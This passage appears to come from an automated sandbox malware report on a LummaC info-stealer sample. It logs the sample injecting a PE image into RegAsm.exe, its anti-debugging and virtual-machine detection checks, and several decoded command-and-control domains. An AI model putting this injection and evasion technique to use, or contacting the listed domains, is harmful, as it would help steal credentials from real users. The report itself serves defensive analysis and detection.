      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00406D404_2_00406D40
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0043CD604_2_0043CD60
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040FD904_2_0040FD90
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00401EE04_2_00401EE0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00422EE34_2_00422EE3
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00422F524_2_00422F52
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041EF394_2_0041EF39
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: String function: 000F7EF0 appears 50 times
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00408E40 appears 47 times
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004095C0 appears 196 times
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 304
      Source: mkFOY01Gl5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/9@2/1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042F339 CoCreateInstance,4_2_0042F339
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6056
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6176
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_03
      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\4499b26f-bbfc-47a7-9773-f6a26885698dJump to behavior
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: mkFOY01Gl5.exeReversingLabs: Detection: 68%
      Source: mkFOY01Gl5.exeVirustotal: Detection: 71%
      Source: unknownProcess created: C:\Users\user\Desktop\mkFOY01Gl5.exe "C:\Users\user\Desktop\mkFOY01Gl5.exe"
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 304
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6176 -s 1796
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: mkFOY01Gl5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: mkFOY01Gl5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_000F76AD push ecx; ret 0_2_000F76C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Query firmware table information (likely to detect VMs)
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5068Thread sleep time: -120000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_0010AA16 FindFirstFileExW,0_2_0010AA16
      Source: Amcache.hve.7.drBinary or memory string: VMware
      Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
      Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
      Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
      Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: RegAsm.exe, 00000004.00000002.2574481805.0000000000B86000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2574481805.0000000000BB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.7.drBinary or memory string: vmci.sys
      Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
      Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
      Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.7.drBinary or memory string: VMware20,1
      Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
      Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_4-11821
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0043AAC0 LdrInitializeThunk,4_2_0043AAC0
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_000FBA03 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000FBA03
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_00106AF1 mov eax, dword ptr fs:[00000030h]0_2_00106AF1
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_00106B35 mov eax, dword ptr fs:[00000030h]0_2_00106B35
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_00101FC4 mov ecx, dword ptr fs:[00000030h]0_2_00101FC4
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_0010E15F GetProcessHeap,0_2_0010E15F
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_000F79C6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_000F79C6
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_000FBA03 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000FBA03
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_000F7CC9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000F7CC9
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_000F7E25 SetUnhandledExceptionFilter,0_2_000F7E25

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Allocates memory in foreign processes
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
      Contains functionality to inject code into remote processes
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_022C018D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_022C018D
      Injects a PE file into a foreign processes
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
      LummaC encrypted strings found
      Source: mkFOY01Gl5.exe, 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: pedestriankodwu.xyz
      Source: mkFOY01Gl5.exe, 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: towerxxuytwi.xyzd
      Source: mkFOY01Gl5.exe, 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ellaboratepwsz.xyzu
      Source: mkFOY01Gl5.exe, 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: penetratedpoopp.xyz
      Source: mkFOY01Gl5.exe, 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: swellfrrgwwos.xyz
